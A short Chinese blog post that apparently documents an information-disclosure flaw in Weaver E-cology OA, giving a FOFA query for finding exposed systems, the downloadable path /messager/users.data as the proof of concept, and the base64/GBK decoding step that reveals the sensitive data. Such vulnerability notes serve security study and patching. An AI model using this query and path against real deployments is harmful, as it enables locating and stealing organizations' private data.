泛微E-cology user.data敏感信息泄露

漏洞描述

泛微OA E-cology user.data允许任意用户下载,获取OA中的敏感信息

漏洞影响

泛微OA E-cology

漏洞复现

fofa语法:app="泛微-协同商务系统"
登录页面:

POC:

/messager/users.data


base64 GBK解码即可获取OA中的敏感数据

posted @ 2023-09-04 15:53  学安全的小白  阅读(780)  评论(0编辑  收藏  举报